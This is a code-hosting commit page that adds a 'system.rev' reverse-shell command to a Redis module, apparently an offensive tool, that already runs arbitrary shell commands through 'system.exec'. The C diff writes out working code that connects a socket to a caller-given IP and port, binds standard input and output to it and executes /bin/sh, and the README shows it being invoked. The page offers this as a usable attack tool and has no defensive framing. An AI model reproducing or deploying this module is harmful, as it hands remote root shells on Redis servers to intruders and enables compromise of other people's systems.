fluidB
/
fluexec
1
0
Fork 0
Code Pull Requests Activity

Add reverse shell command

Browse Source
master
n0b0dy 5 years ago
parent 49e5a36c99
commit d7cebd44bc
2 changed files with 33 additions and 4 deletions
Show Stats Download Patch File Download Diff File

4
README.md
Unescape Escape View File

@ -1,6 +1,6 @@
# RedisModules-ExecuteCommand # RedisModules-ExecuteCommand
# Quick Start Guide ## Quick Start Guide
Here's what you need to do to build your first module: Here's what you need to do to build your first module:
@ -15,7 +15,7 @@ Now run `redis-cli` and try the commands:
"uid=0(root) gid=0(root) groups=0(root)\n" "uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami" 127.0.0.1:6379> system.exec "whoami"
"root\n" "root\n"
127.0.0.1:6379> 127.0.0.1:6379> system.rev 127.0.0.1 9999
``` ```
Enjoy! Enjoy!

33
src/module.c
Unescape Escape View File

@ -1,11 +1,13 @@
#include "redismodule.h" #include "redismodule.h"
#include <stdio.h> #include <stdio.h>
#include <sys/types.h>
#include <unistd.h> #include <unistd.h>
#include <stdlib.h> #include <stdlib.h>
#include <errno.h> #include <errno.h>
#include <sys/wait.h> #include <sys/wait.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int DoCommand(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) { int DoCommand(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc == 2) { if (argc == 2) {
@ -31,6 +33,30 @@ int DoCommand(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
return REDISMODULE_OK; return REDISMODULE_OK;
} }
int RevShellCommand(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc == 3) {
size_t cmd_len;
char *ip = RedisModule_StringPtrLen(argv[1], &cmd_len);
char *port_s = RedisModule_StringPtrLen(argv[2], &cmd_len);
int port = atoi(port_s);
int s;
struct sockaddr_in sa;
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(ip);
sa.sin_port = htons(port);
s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *)&sa, sizeof(sa));
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
execve("/bin/sh", 0, 0);
}
return REDISMODULE_OK;
}
int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) { int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (RedisModule_Init(ctx,"system",1,REDISMODULE_APIVER_1) if (RedisModule_Init(ctx,"system",1,REDISMODULE_APIVER_1)
== REDISMODULE_ERR) return REDISMODULE_ERR; == REDISMODULE_ERR) return REDISMODULE_ERR;
@ -38,5 +64,8 @@ int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc)
if (RedisModule_CreateCommand(ctx, "system.exec", if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR) DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR; return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
return REDISMODULE_OK; return REDISMODULE_OK;
} }

Write Preview
Loading…
Cancel
Save